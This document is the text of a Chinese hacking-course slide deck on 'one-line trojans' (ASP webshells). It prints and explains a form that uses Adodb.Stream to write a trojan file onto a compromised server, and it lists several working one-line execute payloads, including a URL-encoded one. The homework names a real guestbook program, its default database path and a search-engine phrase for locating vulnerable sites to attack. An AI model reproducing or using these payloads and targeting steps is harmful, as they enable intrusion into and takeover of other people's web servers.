黑客_黑侠工作室 vip入侵.pptVIP

黑侠工作室 vip入侵 第四讲：一句话木马的应用 学习目的 学会一句话木马的使用 了解一句话木马的代码内容及意义 学会利用一句话木马拿webshell 代码分析 form action=/ah.asp method=post ‘一个提交表单 textarea name=1 cols=120 rows=10 width=45 set lP=server.CreateObject(Adodb.Stream) lP.Open lP.Type=2 lP.CharSet=gb2312 lP.writetext request(p) lP.SaveToFile server.mappath(conn.asp),2 lP.Close set lP=nothing response.redirect conn.asp /textarea textarea name=p cols=120 rows=10 width=45这填马的代码/textareaBRcenterbr input type=submit value=提交 /form //程序的主要框架是formtextarea/textarea//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示textarea/textarea//添加木马内容用的/form 我们一句一句分析： form action=/ah.asp method=post //action=后面是需要修改的以asp命名的数据库的提交地址//这个标签的意思是建立一个表单 以post方式提交给连接/ah.asp处理 textarea name=value cols=120 rows=10 width=45 //这里的value值根据服务端%execute request(value)%中value而设定//可以自行修改成%execute request(p)%相应这里的value值也必须改为pset lP=server.createObject(Adodb.Stream)//建立流对象，有了对象才可以使用它固有的属性和方法 lP.Open //打开lP.Type=2 //以文本方式lP.CharSet=gb2312 //字体标准lP.writetext request(joeving) //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应lP.SaveToFile server.mappath(wei.asp),2 //将木马内容以覆盖文件的方式写入wei.asp//2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp//但和下面的response.redirectwei.asp中wei.asp的保持一致lP.Close //关闭对象set lP=nothing //释放对象response.redirect wei.asp //转向生成的wei.asp 和上面的wei.asp相对应，也就是你熟悉的asp木马登 陆界面/textarea//这段程序的功能：利用插入到数据库文件的%execute request(value)%这段代码执行第一个textarea中的内容，并将添加的木马内容写入和指向wei.asp，这样就相当于在服务器上建立了个asp木马文件，这样就可以取得webshell了 textarea name=joeving cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbr//这段标签是你用来添加木马内容用的 input type=submit value=提交/form 一句话木马的形式 %execute request(1)% 这句是服务端，配合客户端使用 %On Error Resume Next%%execute request(huan)% % if request(huan) then execute request(huan) % %3C%25execute%20request(%22a%22)%25%3E 还有很多我就不一一介绍了 自己在入侵中测试吧 实践漏洞 为了更容易理解，我找了个简单的留言本，修改出来漏洞，来为大家演示 课后作业 测试程序：音乐听吧 代码下载：/soft/3919.htm 代码缺陷：默认留言数据库为asp并且没做防下载处理 默认数据库地址：/gbook/zpinfo_music_guest.asp 搜索引擎搜索：本站所有MP3只链接收集自网上，其版权属歌手本人或其所属唱片公司所有，用户请在下载后的23小时内删除MP3歌曲，请购买正版C